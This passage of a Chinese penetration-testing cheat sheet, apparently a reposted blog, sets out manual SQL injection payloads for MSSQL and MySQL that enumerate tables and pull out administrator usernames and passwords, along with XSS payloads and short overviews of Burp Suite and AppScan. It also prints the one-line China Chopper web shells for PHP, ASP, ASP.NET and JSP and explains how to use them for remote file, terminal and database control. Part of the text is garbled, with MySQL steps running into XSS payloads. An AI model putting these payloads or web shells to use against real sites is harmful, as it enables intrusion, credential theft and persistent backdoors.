到114的時(shí)候不成立,說(shuō)明第二個(gè)字符的ASCII碼值為114,字符為r。
注意的是英文和數(shù)字的ASCII碼在1-128之間...
MSSQL注入:
having 1=1-- 【爆出一個(gè)表名及字段,如:列 'users.ID' 在選擇列表中無(wú)效】
group by users.ID having 1=1--
group by users.ID, users.username, users.password, users.privs having 1=1--
; insert into users values( 666, attacker, foobar, 0xffff )-- 【插入新記錄】
猜解表名:
SQL SERVER的每一個(gè)數(shù)據(jù)庫(kù)都會(huì)有用戶表和系統(tǒng)表,在系統(tǒng)表sysobjects中,數(shù)據(jù)庫(kù)內(nèi)創(chuàng)建的每個(gè)對(duì)象(約束、默認(rèn)值、日志、規(guī)則、存儲(chǔ)過(guò)程等)在sysobjects表中占一行,那么也就是說(shuō)當(dāng)前數(shù)據(jù)庫(kù)的表名都會(huì)在該表內(nèi)有存在。我們常用到的參數(shù)有三個(gè),name (數(shù)據(jù)表的名字),xtype( 數(shù)據(jù)表的類型 u為用戶表),id( 數(shù)據(jù)表的對(duì)象標(biāo)志)。
and (select top 1 name from sysobjects where xtype='u')>0 (得到第一個(gè)表名:比如user)
and (select top 1 name from sysobjects where xtype='u' and name not in ('user'))>0 得到第二個(gè)表名,后面的以此類推。。
猜解列名:
用 到系統(tǒng)自帶的2個(gè)函數(shù)col_name()和object_id(),col_name()的格式是“COL_NAME( table_id , column_id )”,參數(shù)table_id是表的標(biāo)識(shí)號(hào),column_id是列的標(biāo)識(shí)號(hào),object_id(admin)就是得到admin在sysobjects 中的標(biāo)識(shí)號(hào),column_id=1,2,3表明admin的第1,2,3列。
and (select top 1 col_name(object_id('admin'),1) from sysobjects)>0 【得到admin字段的第一個(gè)列名“username”依次類推,得到“password”“id”等等】
猜解字段內(nèi)容:
and (select top 1 username from [admin])>0 【直接得到用戶名】
and (select top 1 password from [admin])>0 【直接得到密碼】
UNION聯(lián)合查詢:
select name,password,id from user union select user,pwd,uid from 表名
and 1=1 union select 1,2,3,4,5... from 表名 (數(shù)值從1開(kāi)始慢慢加,如果加到5返回正常,那就存在5個(gè)字段)
ASCII逐字解碼法:
1、猜解列長(zhǎng)度
and (select top 1 len(列名)from 表名)>N
其中N是數(shù)字,變換這個(gè)N的值猜解列長(zhǎng)度,當(dāng)N為6正確,為7錯(cuò)誤,則長(zhǎng)度為7
猜解第二條記錄就該使用:select top 1 len(列名) from 表名 where 列名 not in (select top 1 列名 from 表名)
2、猜解用戶和密碼
ASC()函數(shù)和Mid函數(shù),ASC(mid(列名,N,1))得到“列名”第N位字符ASCII碼
猜解語(yǔ)句為:and (select top 1 asc(mid(字段,1,1)) from 數(shù)據(jù)庫(kù)名)>ASCII碼
區(qū)間判斷語(yǔ)句:....between......and......
中文處理法:當(dāng)ASCII轉(zhuǎn)換后為“負(fù)數(shù)”使用abs()函數(shù)取絕對(duì)值。
例:and (select top 1 abs(asc(mid(字段,1,1))) from 數(shù)據(jù)庫(kù)名)=ASC碼
ASCII逐字解碼法的應(yīng)用:
1、猜解表名:and (select count(*) from admin)<>0
2、猜解列名:and (select count(列名) from 表名)<>0
3、猜解用戶個(gè)數(shù):and (select count(*) from 表名)>1,2.. 2正常,3錯(cuò)誤,表中有3條記錄。
4、猜解用戶名的長(zhǎng)度:and (select len(列名) from 表名)>=1、>=2、>=3、>=4。
5、猜解用戶名:and (select count(*)from 表名 where (asc(mid(列名,1,1))) between 30 and 130)<>0
最后提交:and (select asc(mid(列名,1,1)) from 表名)=ascii的值
6、猜解管理員的密碼:
按照上面的原理,把上面的語(yǔ)句中(asc(mid(列名,1,1)的列名換成PASSWORD就能得到密碼了。
MYSQL+PHP注入:
1.判斷是否存在注入,加';and 1=1 ;and 1=2
2.判斷版本 and ord(mid(version(),1,1))>51 代替。
5.判斷數(shù)據(jù)庫(kù)連接帳號(hào)有沒(méi)有寫權(quán)限,and (select count(*) from mysql.user)>0 οnerrοr=alert(/xss/) width=150></img> ( 表示注釋)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression_r (alert('xss'))}</style>
<div style={left:expression_r (alert('xss'))}></div>
<div style={left:expression_r (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
html 實(shí)體 <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expression_r (alert('xss'))}">[/post]
參考地址:純手工注入語(yǔ)句~_一葉扁舟_新浪博客
五.Web掃描測(cè)試工具
1.各大平臺(tái)
2.Burpsuite
Burp Suite 是用于攻擊 web 應(yīng)用程序的集成平臺(tái)。它包含了許多工具,并為這些工具設(shè)計(jì)了許多接口,以促進(jìn)加快攻擊應(yīng)用程序的過(guò)程。所有的工具都共享一個(gè)能處理并顯示HTTP 消息,持久性,認(rèn)證,代理,日志,警報(bào)的一個(gè)強(qiáng)大的可擴(kuò)展的框架。
Burp Suite 能高效率地與單個(gè)工具一起工作,例如:一個(gè)中心站點(diǎn)地圖是用于匯總收集到的目標(biāo)應(yīng)用程序信息,并通過(guò)確定的范圍來(lái)指導(dǎo)單個(gè)程序工作。在一個(gè)工具處理 HTTP 請(qǐng)求和響應(yīng)時(shí),它可以選擇調(diào)用其他任意的 Burp 工具。例如,代理記錄的請(qǐng)求可被 Intruder 用來(lái)構(gòu)造一個(gè)自定義的自動(dòng)攻擊的準(zhǔn)則,也可被 Repeater 用來(lái)
手動(dòng)攻擊,也可被 Scanner 用來(lái)分析漏洞,或者被 Spider(網(wǎng)絡(luò)爬蟲(chóng))用來(lái)自動(dòng)搜索內(nèi)容。應(yīng)用程序可以是“被動(dòng)地”運(yùn)行,而不是產(chǎn)生大量的自動(dòng)請(qǐng)求。 Burp Proxy 把所有通過(guò)的請(qǐng)求和響應(yīng)解析為連接和形式,同時(shí)站點(diǎn)地圖也相應(yīng)地更新。由于完全的控制了每一個(gè)請(qǐng)
求,你就可以以一種非入侵的方式來(lái)探測(cè)敏感的應(yīng)用程序。當(dāng)你瀏覽網(wǎng)頁(yè)(這取決于定義的目標(biāo)范圍)時(shí),通過(guò)自動(dòng)掃描經(jīng)過(guò)代理的請(qǐng)求就能發(fā)現(xiàn)安全漏洞。
IburpExtender 是用來(lái)擴(kuò)展 Burp Suite 和單個(gè)工具的功能。一個(gè)工具處理的數(shù)據(jù)結(jié)果,可以被其他工具隨意的使用,并產(chǎn)生相應(yīng)的結(jié)果。
Burp Suite 工具箱
Proxy——是一個(gè)攔截 HTTP /S 的代理服務(wù)器,作為一個(gè)在瀏覽器和目標(biāo)應(yīng)用程序之間的中間人,允許你攔截,查看,修改在兩個(gè)方向上的原始數(shù)據(jù)流。
Spider——是一個(gè)應(yīng)用智能感應(yīng)的網(wǎng)絡(luò)爬蟲(chóng),它能完整的枚舉應(yīng)用程序的內(nèi)容和功能。
Scanner[僅限專業(yè)版]——是一個(gè)高級(jí)的工具,執(zhí)行后,它能自動(dòng)地發(fā)現(xiàn) web 應(yīng)用程序的安全漏洞。
Intruder——是一個(gè)定制的高度可配置的工具,對(duì) web 應(yīng)用程序進(jìn)行自動(dòng)化攻擊,如:枚舉標(biāo)識(shí)符,收集有用的數(shù)據(jù),以及使用 fuzzing 技術(shù)探測(cè)常規(guī)漏洞。
Repeater——是一個(gè)靠手動(dòng)操作來(lái)補(bǔ)發(fā)單獨(dú)的 HTTP 請(qǐng)求,并分析應(yīng)用程序響應(yīng)的工具。
Sequencer——是一個(gè)用來(lái)分析那些不可預(yù)知的應(yīng)用程序會(huì)話令牌和重要數(shù)據(jù)項(xiàng)的隨機(jī)性的工具。
Decoder——是一個(gè)進(jìn)行手動(dòng)執(zhí)行或?qū)?yīng)用程序數(shù)據(jù)者智能解碼編碼的工具。
3.IBM appscan
下面打開(kāi)appscan創(chuàng)建掃描。
選擇常規(guī)掃描,進(jìn)入配置向?qū)А|c(diǎn)擊下一步,進(jìn)入配置
上面這一步是重點(diǎn),起始URL填寫你要掃描的網(wǎng)址。其它服務(wù)器和域:這里把抽取的所有鏈接都添加進(jìn)去。包括后網(wǎng)站的首頁(yè)鏈接。點(diǎn)擊下一步。
這里提供三種方式來(lái)記錄帳號(hào),不多介紹。第一種和第三種最常用。
然后點(diǎn)擊幾個(gè)下一步后出現(xiàn)后面的選項(xiàng),選擇第三個(gè)或第四項(xiàng)完成掃描的配置。
錄制掃描腳本
完成配置后,下面就要開(kāi)始錄制腳本了呢。
點(diǎn)擊工具欄上的探索按鈕,appscan會(huì)打開(kāi)自帶瀏覽器,輸入系統(tǒng)用戶名密碼登錄系統(tǒng),對(duì)你要掃描的模塊功能進(jìn)行操作。
上圖為我打開(kāi)的appscan自帶瀏覽器(因?yàn)槲逸斎氲木W(wǎng)址有誤,所以無(wú)法訪問(wèn))。操作完成之后,點(diǎn)擊暫停按鈕,關(guān)閉瀏覽器窗口即可。
關(guān)閉瀏覽器后,上面的窗口中會(huì)記錄所有你訪問(wèn)的連接,點(diǎn)擊確定。所有的信息就會(huì)記錄下來(lái)了,下面要做的點(diǎn)擊點(diǎn)擊工具欄上的掃描按鈕開(kāi)始掃描。我們一般晚上下班進(jìn)行,第二天早上來(lái)看掃描結(jié)果就可以了。
本來(lái)到這里就可以結(jié)束了,我再多說(shuō)個(gè)設(shè)置。在手動(dòng)探索的時(shí)候,因?yàn)榇蜷_(kāi)的瀏覽器是appscan自帶的,可能會(huì)存在兼容性問(wèn)題,有些頁(yè)面無(wú)法正常打開(kāi)。那么是否可以用我們電腦上的瀏覽器(IE 、火狐、谷歌)來(lái)進(jìn)行錄制呢了。當(dāng)然是可以的。
菜單欄--工具---選項(xiàng)----高級(jí)
這個(gè)一定要大圖,我們只需要修改openExternalBrowser 選項(xiàng)“值”的參數(shù)就可以了(1=IE、2=firefox、3=chrome)。
4.Acunetix WVS 7使用
六.漏洞利用工具
1.FCK編輯器漏洞綜合利用工具
2.Struts2終極漏洞利用工具
Struts2終極漏洞:遠(yuǎn)程代碼執(zhí)行漏洞,獲取權(quán)限可執(zhí)行任意命令。
詳細(xì)原理介紹參考網(wǎng)址:struts2.0的工作原理?_百度知道
七.上傳工具
中國(guó)菜刀
中國(guó)菜刀以其特色圖形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式連接的數(shù)據(jù)庫(kù)。最強(qiáng)悍的是軟件服務(wù)端只需要簡(jiǎn)單的一行代碼.這絕對(duì)可以排入叉叉最喜歡的十大軟件排行榜。(Ps:在某些黑闊手中菜刀算得上是居家旅行,殺人越貨的必備神器),究竟中國(guó)菜刀怎么使用?下面是叉叉的一些使用方法和經(jīng)驗(yàn)總結(jié)
客戶端界面:
在服務(wù)端運(yùn)行的代碼如下:
PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request(“pass”)%>
ASP.NET: <%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
JSP:<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>
(注意: ASP.NET要單獨(dú)一個(gè)文件或此文件也是Jscript語(yǔ)言)
叉叉之前在上傳漏洞演示,利用burpsuite抓包改包上傳最后講到用菜刀連接,看看是怎么實(shí)現(xiàn)的:
在主視圖中右鍵/添加,在彈出的對(duì)話框中輸入服務(wù)端地址,連接的密碼(這個(gè)必須要),選擇正確的腳本類型和語(yǔ)言編碼,保存后即可使用文件管理,虛擬終端,數(shù)據(jù)庫(kù)管理三大塊功能。要是其它都沒(méi)錯(cuò)誤,那么可能就是你把語(yǔ)言編碼選錯(cuò)了.
1. 文件管理:緩存下載目錄,并支持離線查看緩存目錄,上傳下載修改文件
2. 虛擬終端:人性化的設(shè)計(jì),操作方便;(輸入HELP查看更多用法)
3. 數(shù)據(jù)庫(kù)管理:圖形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS支持ADO方式連接的數(shù)據(jù)庫(kù)。
(各種腳本條件下的數(shù)據(jù)庫(kù)連接方法請(qǐng)點(diǎn)擊數(shù)據(jù)庫(kù)管理界面左上角處的配置按鈕查看)
關(guān)于配置信息怎么填?
PHP腳本:
<T>類型</T> 類型可為MYSQL,MSSQL,ORACLE,INFOMIX中的一種
<H>主機(jī)地址<H> 主機(jī)地址可為機(jī)器名或IP地址,如localhost
< U>數(shù)據(jù)庫(kù)用戶</U> 連接數(shù)據(jù)庫(kù)的用戶名,如root
< P>數(shù)據(jù)庫(kù)密碼</P> 連接數(shù)據(jù)庫(kù)的密碼,如123455
ASP和ASP.NET腳本:
<T>類型</T> 類型只能填A(yù)DO
< C>ADO配置信息</C>
ADO連接各種數(shù)據(jù)庫(kù)的方式不一樣。如MSSQL的配置信息為
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456
叉叉用本機(jī)的mysql來(lái)演示:
4.網(wǎng)站蜘蛛功能:織出一張網(wǎng)站的目錄結(jié)構(gòu)。下載的列表文件存在桌面,右鍵菜單/載入U(xiǎn)RL列表即可以根據(jù)地址得到目錄結(jié)構(gòu)。
5.定時(shí)提醒當(dāng)鬧鐘來(lái)使吧, 周期:每月/每周/每日/只一次。
6.快速啟動(dòng)
一些常用的快捷方式放在這里,可以指定用戶身份運(yùn)行程序。這部分?jǐn)?shù)據(jù)是以加密存儲(chǔ)的。
7.瀏覽器
地址欄輸入HELP
8.自定義服務(wù)端代碼
參考地址:強(qiáng)大的Web管理軟件,中國(guó)菜刀(chopper)的使用方法和教程 - 軟件工具 - 紅黑聯(lián)盟
八.后臺(tái)、目錄掃描工具
御劍1.5
打開(kāi)工具,添加URL
雙擊添加目錄、后臺(tái)字典文件,設(shè)置線程,HTTP響應(yīng)回顯信息
總結(jié)
以上是生活随笔為你收集整理的渗透测试基础总结(脚本小子)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 软件工程与计算II-5-需求基础
- 下一篇: protel 99se 简单的手动画pc